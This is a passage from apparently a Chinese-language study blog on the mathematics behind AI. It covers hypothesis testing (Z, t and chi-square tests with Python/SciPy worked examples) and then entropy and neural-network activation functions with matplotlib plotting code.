    norm.pdf(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50)),
    alpha=.15, color="blue", label="Acceptance region |Z|<= k")
    plt.legend()
    plt.show() # 显示图片

    png

    12.1.2 左右侧检验与双侧检验

    • 左侧检验: $H_0:\mu\ge\mu_0($或$\mu=\mu_0),H_1:\mu<\mu_0$, 拒绝域: $Z\le-Z_\alpha$

    • 右侧检验: $H_0:\mu\le\mu_0($或$\mu=\mu_0),H_1:\mu>\mu_0$, 拒绝域: $Z\ge Z_\alpha$

    • 双侧检验: $H_0:\mu=\mu_0,H_1:\mu\ne\mu_0$, 拒绝域: $|Z|\ge Z_\alpha$

    12.1.3 P 值检验法

    以上为临界值检验法,下面介绍 P 值检验法,所谓 P 值检验法就是由检验统计量的样本观察值得出的原假设可被拒绝的最小显著性水水平。

    数学基础-概率论 05(统计推断-分布拟合检验)

    png

    例 12.3

    某食品厂用自动装罐机装罐头食品, 每罐的标准重量$\mu_0=500g$

    设罐重是服从正态分布的随机变量, 标准差$\sigma=10$

    从中抽取$n_1 =10$罐, 测得平均重量为$\bar X_1=506g$

    隔一段时间后又抽$n_1=10$罐, 测的平均重量为$\bar X_2=505g$

    问这时机器工作是否正常?

    提出假设$H_0:\mu=\mu_0=500,H_1:\mu\ne\mu_0$

    取$\alpha=0.05$

    $Z_1=\frac{506-500}{10/\sqrt{10}}=1.897, Z_2=\frac{505-500}{10/\sqrt{10}}=1.581$

    $P{Z\ge Z_1}=P{Z\ge 1.897}=1-\Phi(1.897)=0.029>\frac{\alpha}{2}=0.025$

    $P{Z\ge Z_2}=P{Z\ge 1.581}=1-\Phi(1.581)=0.057>\frac{\alpha}{2}=0.025$

    接受原假设$H_0$, 第二次抽样支持原假设的强度更大

    12.2 Z 检验(正态总体均值的假设检验, 方差已知时)

    $\bar X\sim N(\mu_0, \frac{\sigma^2}{n})$当$H_0$真实时$Z=\frac{\bar X -\mu}{\sigma/\sqrt n}\sim N(0,1)$

    若两组样本方差$\sigma2_1$和$\sigma2_2$已知, 统计量$Z$的计算公式:

    $$Z=\frac{\bar X_1 - \bar X_2}{\sqrt{\frac{\sigma2_1}{n_1}+\frac{\sigma2_2}{n_2}}}\sim N(0,1)$$

    12.3 t 检验(正态总体均值的假设检验, 方差未知时)

    由于总体方差未知, 用样本标准差$S$代替$Z$检验法中的总体标准差$\sigma$

    $$T=\frac{\bar X - \mu_0}{S/\sqrt n}\sim t(n-1)$$

    若有两种独立样本, 选取统计量

    $$T=\frac{(\bar X - \bar Y)-(\mu_1-\mu_2)}{S_w\sqrt{\frac{1}{n_1}+\frac{1}{n_2}}}$$

    其中

    $$S_w=\sqrt{\frac{(n_1-1)S2_1+(n_2-1)S2_2}{n_1+n_2-2}}$$

    12.4 卡方检验

    未知总体的分布的假设检验(非参数检验)$\chi^2$拟合检验法

    其基本思想是用得到的样本观察值来与假设的总体的分布函数(或分布律)来进行某种拟合, 再根据拟合的程度确定是否接受原假设, 从而推断总体是否服从假设的分布.

    设总体$X$的分布函数$F(x)$未知, $X_1,X_2,…,X_n$是来自总体$X$的一个样本, 建立假设检验

    $H_0:F(x)=F_0(x), H_1:F(x)\ne F_0(x)$, 其中$F_0(x)$是已知的分布函数

    皮尔逊定理

    若$n$充分大(一般$n\ge 50$), 则当$H_0$为真时, 无论总体 X 服从何种分布

    统计量$\chi2=\Sigmak_{i=1}\frac{(n_i-np_i)2}{np_i}$都近似服从$\chi2(k-r-1)$,$r$是分布中未知参数的个数

    例 12.12

    某市自开办有奖储蓄以来, 13 期兑奖中各数码的频数汇总如下表所示

    数码$i$0 1 2 3 4 5 6 7 8 9总数
    频数$f_i$21 28 37 36 31 45 30 37 33 52350

    如果检验器械或操作方法没有问题, 则各数码服从均匀分布, 提出检验假设$H_0:p_i=\frac{1}{10},i=0,1,2,…,9$理论频数$np_i=35$,

    统计量$\chi2=\Sigma{10}_{i=1}\frac{(n_i-np_i)^2}{np_i}=\frac{688}{35}=19.657$

    而$\chi^2_\alpha(k-1)=16.9,19.657>16.9$拒绝$H_0$, 认为器械操作方法有问题

    12.5 假设检验中的两类错误

    决策结果\实际情况$H_0$为真$H_0$为假
    拒绝$H_0$弃真(第一类错误)取伪(无错)
    接受$H_0$存真(无错)取伪(第二类错误)

    $P{Z\in W|H_0 is true}\le \alpha$

    $P{Z\notin W|H_0 is not true}=\beta$

    在假设检验中, 通常是要求犯第一类错误的概率不超过预定的数$\alpha$(如 0.05, 0.01 等), 同时希望犯第二类错误的概率尽可能小

    12.6 综合实例 1——体检数据中的假设检验问题

    变量名描述
    Temperature体温(华氏温度)
    Gender性别(1 为男, 2 为女)
    Heart Rate心率(每分钟心跳次数)

    (1)显示数据集及相关统计描述信息(均值, 标准差等)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import pandas as pd
    import pylab
    import math
    import numpy as np
    import matplotlib.pyplot as plt
    import numpy as np
    from scipy.stats import norm
    import scipy.stats
    import warnings
    warnings.filterwarnings('ignore')

    df = pd.read_csv('normtemp.txt', sep=' ', names=['Temperature', 'Gender', 'Heart Rate'])
    df.describe()
    Temperature Gender Heart Rate
    count 130.000000 130.000000 130.000000
    mean 98.249231 1.500000 73.761538
    std 0.733183 0.501934 7.062077
    min 96.300000 1.000000 57.000000
    25% 97.800000 1.000000 69.000000
    50% 98.300000 1.500000 74.000000
    75% 98.700000 2.000000 79.000000
    max 100.800000 2.000000 89.000000

    分别显示了各属性的总数, 均值, 标准差, 最大值和最小值, 以及各种分位点值

    1
    df.head()
    Temperature Gender Heart Rate
    0 96.3 1 70
    1 96.7 1 71
    2 96.9 1 74
    3 97.0 1 80
    4 97.1 1 73

    (2) 试检验体温的分布是否服从正态分布

    这里用的跟之前书上讲的根本就不是一个方法…

    正态检验 (Normality Test)——常见方法汇总与简述

    png

    有多种手段评估数据是否正态分布。分两大类:图形和统计量。图形手段包括 q-q plot 和 p-p plot,统计量手段包括 Kolmogorov-Smirnov 检验 and Shapiro-Wilks 检验。

    Samuel Shapiro 和 MartinWilk 于 1965 年提出了 Shapiro–Wilk 检验。他们观察到 Normal probability plot 与线性回归很类似。Normalprobability plot 是 q-q plot 的特例,检查样本数据集是否匹配某正态分布,比如标准正态分布 N(0,1)。

    1.直方图初判
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    observed_temperatures = df['Temperature'].sort_values()
    bin_val = np.arange(start= observed_temperatures.min(), stop= observed_temperatures.max(), step = .05)
    mu, std = np.mean(observed_temperatures), np.std(observed_temperatures)
    p = norm.pdf(observed_temperatures, mu, std)
    plt.hist(observed_temperatures,bins = bin_val, density=True, stacked=True)
    plt.plot(observed_temperatures, p, color = 'red')
    plt.xticks(np.arange(95.75,101.25,0.25),rotation=90)
    plt.xlabel('Human Body Temperature Distributions')
    plt.xlabel('human body temperature')
    plt.show()
    print('Average (Mu): '+ str(mu) + ' / ' 'Standard Deviation: '+str(std))

    png

    Average (Mu): 98.24923076923076 / Standard Deviation: 0.7303577789050376
    2.利用 Scipy 工具检验正态性
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    # Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test
    """
    语法:scipy.stats.shapiro(x, a=None, reta=False)
    x 为待检验的数据
    返回(统计数, P 值)
    """
    shapiro_test, shapiro_p = scipy.stats.shapiro(observed_temperatures)
    print("Shapiro-Wilk Stat:",shapiro_test, "\nShapiro-Wilk p-Value:", shapiro_p)
    """
    语法 scipy.stats.normaltest(a, axis=0, nan_policy='propagate')
    a 是待检验数据
    axis 正态分布测试将沿其计算的轴
    返回:(对数据集进行假设检验的 k2 值, P 值)
    """
    k2, p = scipy.stats.normaltest(observed_temperatures)
    print('p:',p)
    Shapiro-Wilk Stat: 0.9865769743919373 Shapiro-Wilk p-Value: 0.2331680953502655p: 0.2587479863488212
    3.通过分位数-分位数(Q-Q)图检查正态分布
    1
    2
    3
    # stats.probplot(QQ 图)
    scipy.stats.probplot(observed_temperatures, dist="norm", plot=pylab)
    pylab.show()

    png

    4.基于 ECDF(经验累积分布函数)正态检验

    根据当前样本的均值和标准差随机生成一个新的正态分布, 然后将它的累积分布函数和样本数据的累积分布函数比较, 如果实测差异足够大, 该检验将拒绝总体呈正态分布的原假设

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
def ecdf(data):
    """Compute the ECDF of a 1-D data array."""
    n = len(data)
    x = np.sort(data)
    y = np.arange(1, n + 1) / n
    return x, y

# Compute the empirical mean and standard deviation

# Number of samples
n = len(df['Temperature'])

# Sample mean
mu = np.mean(df['Temperature'])

# Sample standard deviation
std = np.std(df['Temperature'])

print('Mean temperature: ', mu, 'with standard deviation of +/-', std)

# Draw a random normal sample based on the mean and std of the data.
normalized_sample = np.random.normal(mu, std, size=10000)
x_temperature, y_temperature = ecdf(df['Temperature'])
normalized_x, normalized_y = ecdf(normalized_sample)

# Plot the ECDFs
fig = plt.figure(figsize=(8, 5))
plt.plot(normalized_x, normalized_y)
plt.plot(x_temperature, y_temperature, marker='.', linestyle='none')
plt.ylabel('ECDF')
plt.xlabel('Temperature')
plt.legend(('Normal Distribution', 'Sample data'))
Mean temperature:  98.24923076923076 with standard deviation of +/- 0.730357778905038
<matplotlib.legend.Legend at 0x1bc43440b20>

(figure: ECDF of the sample against a fitted normal distribution)

3. Some scholars claim that 98.6°F (37°C) is the average human body temperature. Should we accept this claim?

from scipy import stats

CW_mu = 98.6
# One-sample t-test
stats.ttest_1samp(df['Temperature'], CW_mu, axis=0)
    Ttest_1sampResult(statistic=-5.454823292364077, pvalue=2.410632041561008e-07)

$p\text{-value}\approx 0$, so we reject the null hypothesis.
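The statistic is easy to reproduce by hand from the one-sample t formula $t = (\bar x - \mu_0)/(s/\sqrt n)$, using the sample standard deviation $s$ (ddof=1). A minimal sketch reusing the df loaded above:

import numpy as np

n = len(df['Temperature'])
x_bar = df['Temperature'].mean()
s = df['Temperature'].std(ddof=1)        # sample standard deviation
t = (x_bar - 98.6) / (s / np.sqrt(n))
print(t)                                 # ~ -5.4548, matching ttest_1samp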

4. Is there a clear difference between male and female body temperatures?

female_temp = df.Temperature[df.Gender == 2]
male_temp = df.Temperature[df.Gender == 1]

# When it is unclear whether the two populations share the same variance,
# first run Levene's test for homogeneity of variance.
# Note: stats.norm.rvs(loc) draws one random normal per observation centered
# on it, so this randomized check gives slightly different results each run.
rvs1 = stats.norm.rvs(female_temp)
rvs2 = stats.norm.rvs(male_temp)
print(stats.levene(rvs1, rvs2))

mean_female_temp = np.mean(female_temp)
mean_male_temp = np.mean(male_temp)
print('Average female body temperature = ' + str(mean_female_temp))
print('Average male body temperature = ' + str(mean_male_temp))

# Compute independent t-test
"""
T-test for the means of two independent samples.
It tests the null hypothesis that the two independent samples have the same
mean (expected) value; by default it assumes the populations share a variance.
"""
print(stats.ttest_ind(female_temp, male_temp, axis=0))
LeveneResult(statistic=2.1897731829800553, pvalue=0.14138681028945846)
Average female body temperature = 98.39384615384616
Average male body temperature = 98.1046153846154
Ttest_indResult(statistic=2.2854345381654984, pvalue=0.02393188312240236)

The LeveneResult differs from run to run, but its p-value is always far above 0.05, so we take the two populations to have equal variances.

The Ttest_indResult p-value is below the 0.05 significance level, so with more than 95% confidence the two groups differ.

12.7 Worked Example 2: Does Race Affect Job Applications?

    import pandas as pd
    import numpy as np
    from scipy import stats

    data = pd.io.stata.read_stata('us_job_market_discrimination.dta')
    data.head()
    id ad education ofjobs yearsexp honors volunteer military empholes occupspecific ... compreq orgreq manuf transcom bankreal trade busservice othservice missind ownership
    0 b 1 4 2 6 0 0 0 1 17 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 b 1 3 3 6 0 1 1 0 316 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 b 1 4 1 6 0 0 0 0 19 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 b 1 3 4 6 0 1 0 1 313 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 b 1 3 3 22 0 0 0 0 313 ... 1.0 1.0 0.0 0.0 0.0 0.0 0.0 1.0 0.0 Nonprofit

    5 rows × 65 columns

    1
    2
    3
    blacks = data[data.race == 'b']
    whites = data[data.race == 'w']
    blacks.call.describe()
count    2435.000000
mean        0.064476
std         0.245649
min         0.000000
25%         0.000000
50%         0.000000
75%         0.000000
max         1.000000
Name: call, dtype: float64
    whites.call.describe()
count    2435.000000
mean        0.096509
std         0.295346
min         0.000000
25%         0.000000
50%         0.000000
75%         0.000000
max         1.000000
Name: call, dtype: float64

The callback rate is 6.4% for black-sounding names and 9.7% for white-sounding names.
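As a cross-check (my own addition, not from the book), the gap between the two callback rates can also be tested with a two-proportion z-test; the squared z statistic equals the uncorrected chi-square statistic for the 2×2 table computed below:

import numpy as np
from scipy import stats

n_b, n_w = 2435, 2435
called_b, called_w = 157, 235
p_b, p_w = called_b / n_b, called_w / n_w

# Pooled callback rate under H0 (equal rates for both groups)
p_pool = (called_b + called_w) / (n_b + n_w)
se = np.sqrt(p_pool * (1 - p_pool) * (1 / n_b + 1 / n_w))
z = (p_w - p_b) / se
p_value = 2 * (1 - stats.norm.cdf(abs(z)))
print(z, p_value)   # z ~ 4.11, p ~ 4e-05: the rates differ significantly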

    blacks_called = len(blacks[blacks['call'] == True])
    blacks_not_called = len(blacks[blacks['call'] == False])
    whites_called = len(whites[whites['call'] == True])
    whites_not_called = len(whites[whites['call'] == False])
observed = pd.DataFrame({'blacks': {'called': blacks_called, 'not_called': blacks_not_called},
                         'whites': {'called': whites_called, 'not_called': whites_not_called}})
    observed
    blacks whites
    called 157 235
    not_called 2278 2200
# Count how many applicants were and were not called back
num_called_back = blacks_called + whites_called
num_not_called = blacks_not_called + whites_not_called
# Overall callback rate (the expected rate under the null hypothesis)
rate_of_callbacks = num_called_back / (num_not_called + num_called_back)
# Expected numbers of called and not-called applicants
expected_called = len(data) * rate_of_callbacks
expected_not_called = len(data) * (1 - rate_of_callbacks)
# Expected 2x2 table (equal callback rates for blacks and whites)
expected = pd.DataFrame({'blacks': {'called': expected_called / 2, 'not_called': expected_not_called / 2},
                         'whites': {'called': expected_called / 2, 'not_called': expected_not_called / 2}})
expected
    blacks whites
    called 196.0 196.0
    not_called 2239.0 2239.0
    import scipy.stats as stats

    observed_frequencies = [blacks_not_called, whites_not_called, whites_called, blacks_called]
    expected_frequencies = [expected_not_called / 2, expected_not_called / 2, expected_called / 2, expected_called / 2]
# Chi-square test
    stats.chisquare(f_obs=observed_frequencies, f_exp=expected_frequencies)
    Power_divergenceResult(statistic=16.87905041427022, pvalue=0.0007483959441097264)

$p\text{-value}\approx 0.0007 < 0.05$, so we conclude that racial discrimination in the job search does exist.
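The same conclusion follows from scipy's contingency-table helper, which derives the expected counts and the correct single degree of freedom itself; the stats.chisquare call above treats the four cells as one multinomial (3 degrees of freedom), whereas a 2×2 table has 1. A small sketch (correction=False disables Yates' continuity correction so the statistic matches the one above):

from scipy.stats import chi2_contingency

table = [[157, 235], [2278, 2200]]   # called / not called, blacks vs whites
chi2, p, dof, expected = chi2_contingency(table, correction=False)
print(chi2, p, dof)                  # ~16.879, ~4e-05, 1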

12.9 Exercises

1. t-test

Crops A and B are planted simultaneously on 10 plots of land each; the yields follow normal distributions with the same variance.

The computed statistics are $\bar X=30.97, \bar Y=21.79, S_x=26.7, S_y=12.1$. Is there a significant difference between the two crops' yields?

import numpy as np
from scipy import stats

mean1 = 30.97
mean2 = 21.79

std1 = 26.7
std2 = 12.1

nobs1 = 10
nobs2 = 10

# ttest_ind_from_stats expects sample standard deviations (ddof=1);
# multiply by sqrt(n/(n-1)) to convert from the population-style (ddof=0) values.
modified_std1 = np.sqrt(np.float32(nobs1) / np.float32(nobs1 - 1)) * std1
modified_std2 = np.sqrt(np.float32(nobs2) / np.float32(nobs2 - 1)) * std2

(statistic, pvalue) = stats.ttest_ind_from_stats(mean1=mean1, std1=modified_std1, nobs1=10,
                                                 mean2=mean2, std2=modified_std2, nobs2=10)

print("t statistic is: ", statistic)
print("pvalue is: ", pvalue)
t statistic is:  0.9394886573346275
pvalue is:  0.35991721678518696

$p\text{-value}\ge 0.05$: no significant difference.

2. Chi-square test

Two classes are randomly sampled from a middle school. Is there a significant difference in the two classes' attitudes toward splitting into science and humanities tracks ($\alpha=0.05$)?

Chi-square test (independence of two categorical variables) and chi2_contingency

          In favor  Against  Total
Class A         37       27     64
Class B         39       21     60
Total           76       48    124

Degrees of freedom = (rows − 1) × (columns − 1) = 1

$\chi^2=\frac{n(AD-BC)^2}{(A+B)(C+D)(A+C)(B+D)}=\frac{124\times(37\times 21-27\times 39)^2}{64\times 60\times 76\times 48}\approx 0.674<\chi^2_{0.05}(1)=3.841$

so there is no significant difference

from scipy.stats import chi2_contingency
import numpy as np

kf_data = np.array([[37, 27], [39, 21]])
chi2, p, dof, expected = chi2_contingency(kf_data)
print('chisq-statistic=%.4f, p-value=%.4f, df=%i expected_freq=%s' % (chi2, p, dof, expected))
chisq-statistic=0.4054, p-value=0.5243, df=1
expected_freq=[[39.22580645 24.77419355]
 [36.77419355 23.22580645]]

$p\text{-value}>0.05$, so there is no significant difference. (For 2×2 tables chi2_contingency applies Yates' continuity correction by default, which is why the statistic is 0.405 rather than the uncorrected 0.674.)

    ]]>
    @@ -10050,7 +10050,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8011/ - 正文

11 Entropy and Activation Functions

11.1 Entropy and Information Entropy

11.1.1 The Concept of Entropy

[Bi Dao] You will click into this video and come out utterly confused, and all of it was predetermined by the laws of physics

A simple introduction to entropy, the kind you understand at a glance

11.1.2 The Concept of Information Entropy

How to understand information entropy

Science proves Chinese is the most advanced language! [Hardcore science popularization] What is information entropy

Is Chinese the most efficient language? — A brief talk on information entropy

The harder a piece of information is to predict $\to$ the more information it carries $\to$ the higher the information entropy

    $\color{Purple}{H(P _ 1, P _ 2,…, P _ n)} = - \lambda\color{Green}{\Sigma^n _ {i=1}}\color{Blue}{P _ i} \color{Red}{\log(P _ i)}$

The information entropy is the information content (uncertainty) of each individual symbol, multiplied by its probability of occurrence and summed, i.e. the average uncertainty per symbol
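A quick sanity check of the formula (a minimal sketch of my own, taking $\lambda = 1$ and base-2 logarithms so entropy is measured in bits):

import numpy as np

def entropy(p):
    """Shannon entropy in bits of a discrete distribution p."""
    p = np.asarray(p, dtype=float)
    p = p[p > 0]                     # treat 0 * log(0) as 0
    return -np.sum(p * np.log2(p))

print(entropy([0.5, 0.5]))   # fair coin -> 1.0 bit
print(entropy([0.9, 0.1]))   # biased coin -> ~0.469 bits: more predictable, less entropy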

11.1.3 Computing Information Entropy with Python Libraries

(1) Uncertainty and information entropy of a uniformly distributed event
import numpy as np
import matplotlib.pyplot as plt

plt.figure(figsize=(8, 5), dpi=80)
ax = plt.subplot(111)
ax.spines['right'].set_color('none')  # hide the right border
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
ax.yaxis.set_ticks([1, 2, 3, 4, 5, 6])

# Define the uniform distribution U[0, 1]
X = np.linspace(0, 1, 101, endpoint=True)
X = X[1:100]
print(X)

# Compute the per-symbol uncertainty -p * log2(p)
Y = -1 * X * np.log2(X)
print("Entropy component (per-symbol uncertainty) peaks at p = {} with value {}".format(X[np.argmax(Y)], np.max(Y)))

plt.plot(X, Y, color="green", linewidth=2, label="-p * log2(p)")
plt.scatter(X[np.argmax(Y)], np.max(Y), color="black")
plt.text(X[np.argmax(Y)], np.max(Y) + 0.2, "({}, {})".format(X[np.argmax(Y)], np.round(np.max(Y), 2)))

# Compute the information content -log2(p)
Y = -1 * np.log2(X)
plt.plot(X, Y, color="red", linestyle="dashed", label="-log2(p)")

plt.scatter(0.5, 1, color="black")
plt.text(0.5, 1.2, "(0.5, 1.0)")

plt.legend()  # show the legend
plt.show()
[0.01 0.02 0.03 ... 0.97 0.98 0.99]
Entropy component (per-symbol uncertainty) peaks at p = 0.37 with value 0.5307290449339367

(figure: the -p·log2(p) and -log2(p) curves, with the maximum marked)

For the plotted component $f(p)=-p\log_2 p$:

$f'(p)=-\frac{\ln p+1}{\ln 2}$

$f'(p)=0\to p=\frac{1}{e}\approx 0.37$

• As the probability (of selecting a given event) increases, the outcome grows more and more certain, the uncertainty shrinks, and the information entropy (the average per-symbol uncertainty) decreases as well

• For a uniform distribution over two states (both with probability 0.5, e.g. a coin toss), the information entropy is 1

• When the probability reaches 1, the outcome is fully determined and will not vary, and the information entropy drops to 0

• Entropy can be applied to classification tasks: the lower the entropy, the better the classification

• Entropy can measure how strongly two features influence an outcome: the feature with the smaller entropy influences the outcome more

(2) Information entropy of uniform vs. non-uniform distributions

For the same random event, the information entropy is maximal when the distribution is uniform

import numpy as np

# create some probabilities that sum to 1
np.random.seed(42)
x = np.random.randint(200, size=10)
x = np.unique(x)
x = x / np.sum(x)
print("Non-uniform probability distribution:", x)

# compare the entropy of the non-uniform distribution with the uniform one
print("Entropy of the non-uniform distribution:", np.sum(-1 * x * np.log2(x)))
print("Entropy of the uniform distribution:", -1 * np.log2(1 / len(x)))
Non-uniform probability distribution: [0.01567749 0.02239642 0.07950728 0.10302352 0.11422172 0.11870101 0.13549832 0.20044793 0.21052632]
Entropy of the non-uniform distribution: 2.8962045966225145
Entropy of the uniform distribution: 3.1699250014423126

11.2 Activation Functions

11.2.1 The Concept of an Activation Function

Each neuron has an activation function that acts on the neuron's input and produces its output:

$y=f\left(\Sigma _ i \omega _ i x _ i + b\right)$

Without an activation function, or with a linear one, i.e. $f(x)=x$, the network's computational power is quite limited.

A nonlinear activation function turns the linear map into a nonlinear one, giving the network the ability to describe complex data and learn complex tasks; the little sketch below shows why.
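Composing purely linear layers just yields another linear map, so depth alone adds no expressive power. A tiny numpy check (the weight values are arbitrary):

import numpy as np

W1 = np.array([[1.0, 2.0], [3.0, 4.0]])    # first "layer" weights (arbitrary)
W2 = np.array([[0.5, -1.0], [2.0, 0.0]])   # second "layer" weights (arbitrary)
x = np.array([1.0, -2.0])

# Two linear layers in a row...
y_two_layers = W2 @ (W1 @ x)
# ...collapse into a single linear layer with weight matrix W2 @ W1.
y_one_layer = (W2 @ W1) @ x
print(np.allclose(y_two_layers, y_one_layer))   # True: no extra expressive power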

11.2.2 Common Activation Functions

Sigmoid function

$f(x)=\frac{1}{1+e^{-x}}$

$f'(x)=f(x)\left[ 1-f(x) \right]=\frac{1}{e^{x}\left(\frac{1}{e^{x}}+1\right)^{2}}$

import numpy as np
import matplotlib.pyplot as plt
# matplotlib.ticker.MultipleLocator places ticks at every integer multiple of a base within the view interval.
from matplotlib.ticker import MultipleLocator, FormatStrFormatter


def sigmoid(x):
    return 1 / (1 + np.exp(-x))


def sigmoid_derivative(x):
    return sigmoid(x) * (1 - sigmoid(x))


plt.figure(figsize=(8, 5), dpi=80)
ax = plt.subplot(111)
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
ax.yaxis.set_minor_locator(MultipleLocator(0.1))

X = np.linspace(-10, 10, 201, endpoint=True)
print("X: ", X)

Y1 = sigmoid(X)
plt.plot(X, Y1, color="green", linewidth=2, label="sigmoid function")

Y2 = sigmoid_derivative(X)
plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="sigmoid derivative function")

ax.set_title("sigmoid function & sigmoid derivative function", fontsize=16)
plt.legend()
plt.show()
X:  [-10.   -9.9   -9.8  ...   9.8   9.9   10. ]

(figure: sigmoid function and its derivative)

• Squashes any real-valued input into the interval [0, 1], which helps the outputs converge

• Suffers from vanishing gradients: $\lim _ {x\to \infty}f'(x) = 0$ (see the numeric check after this list)

• Not centered at the origin, which is inconvenient for the layers below (could one simply subtract 0.5?)

• Involves exponentiation, which is relatively slow
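A numeric look at the vanishing gradient mentioned in the list above (a self-contained sketch repeating the two definitions):

import numpy as np

def sigmoid(x):
    return 1 / (1 + np.exp(-x))

def sigmoid_derivative(x):
    return sigmoid(x) * (1 - sigmoid(x))

# The gradient peaks at 0.25 and decays quickly as |x| grows, so a deep
# stack of sigmoids multiplies many tiny factors together.
for x in [0, 2, 5, 10]:
    print(x, sigmoid_derivative(x))
# 0 -> 0.25, 2 -> ~0.105, 5 -> ~0.0066, 10 -> ~4.5e-05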

tanh function

$f(x)=\frac{e^x - e^{-x}}{e^x + e^{-x}}$

$f'(x) = 1 - \tanh^2 x$

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, FormatStrFormatter


def tanh(x):
    return (np.exp(x) - np.exp(-x)) / (np.exp(x) + np.exp(-x))


def tanh_derivative(x):
    return 1 - tanh(x) * tanh(x)


plt.figure(figsize=(8, 5), dpi=80)
ax = plt.subplot(111)
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
ax.yaxis.set_minor_locator(MultipleLocator(0.1))

X = np.linspace(-10, 10, 201, endpoint=True)
print("X: ", X)

Y1 = tanh(X)
plt.plot(X, Y1, color="green", linewidth=2, label="tanh function")

Y2 = tanh_derivative(X)
plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="tanh derivative function")

ax.set_title("tanh function & tanh derivative function", fontsize=16)
plt.legend()
plt.show()
X:  [-10.   -9.9   -9.8  ...   9.8   9.9   10. ]

(figure: tanh function and its derivative)

• Symmetric about the origin (zero-centered), which helps convergence

• Still suffers from the vanishing-gradient problem

• Involves exponentiation, which is relatively slow

ReLU function

$f(x) = \max(0, x)$

$f'(x) = \begin{cases} 1, & x>0 \\ 0, & x\le 0 \end{cases}$

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, FormatStrFormatter


def relu(x):
    return np.where(x <= 0, 0, x)


def relu_derivative(x):
    return np.where(x <= 0, 0, 1)


plt.figure(figsize=(8, 5), dpi=80)
plt.xlim(-1.5, 1.5)
plt.ylim(0, 1)
ax = plt.subplot(111)
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
ax.yaxis.set_minor_locator(MultipleLocator(0.1))

X = np.linspace(-10, 10, 201, endpoint=True)
print("X: ", X)

Y1 = relu(X)
plt.plot(X, Y1, color="green", linewidth=2, label="ReLU function")

Y2 = relu_derivative(X)
plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="ReLU derivative function")

ax.set_title("ReLU function & ReLU derivative function", fontsize=16)
plt.legend()
plt.show()
X:  [-10.   -9.9   -9.8  ...   9.8   9.9   10. ]

(figure: ReLU function and its derivative)

• Avoids the vanishing-gradient problem (for positive inputs)

• Fast to compute

• Not symmetric about the origin, which can slow convergence (though it still converges faster than Sigmoid and tanh)

• Inputs below 0 are never activated (the "dying ReLU" problem)

Leaky ReLU (PReLU)

• Fixes the problem that ReLU is 0 on the negative x-axis, which can leave some neurons permanently inactive

• In theory it keeps all the advantages of ReLU

$f(x)=\max(\alpha x, x)$ ($\alpha$ is usually taken as 0.01)

$f(x)=\max(0.01x, x)$

$f'(x)=\begin{cases} 1, & x>0 \\ 0.01, & x\le 0 \end{cases}$

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, FormatStrFormatter


def prelu(x):
    return np.where(x <= 0, 0.01 * x, x)


def prelu_derivative(x):
    return np.where(x <= 0, 0.01, 1)


plt.figure(figsize=(8, 5), dpi=80)
plt.xlim(-1.5, 1.5)
plt.ylim(0, 1)
ax = plt.subplot(111)
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
ax.yaxis.set_minor_locator(MultipleLocator(0.1))

X = np.linspace(-10, 10, 201, endpoint=True)
print("X: ", X)

Y1 = prelu(X)
plt.plot(X, Y1, color="green", linewidth=2, label="PReLU function")

Y2 = prelu_derivative(X)
plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="PReLU derivative function")

ax.set_title("PReLU function & PReLU derivative function", fontsize=16)
plt.legend()
plt.show()
X:  [-10.   -9.9   -9.8  ...   9.8   9.9   10. ]

(figure: PReLU function and its derivative)

11.3 Worked Example: Information Entropy in a Classification Algorithm

Use the ID3 classification algorithm, which picks the split direction by the largest reduction in information entropy

import pandas as pd
import numpy as np

rows = [
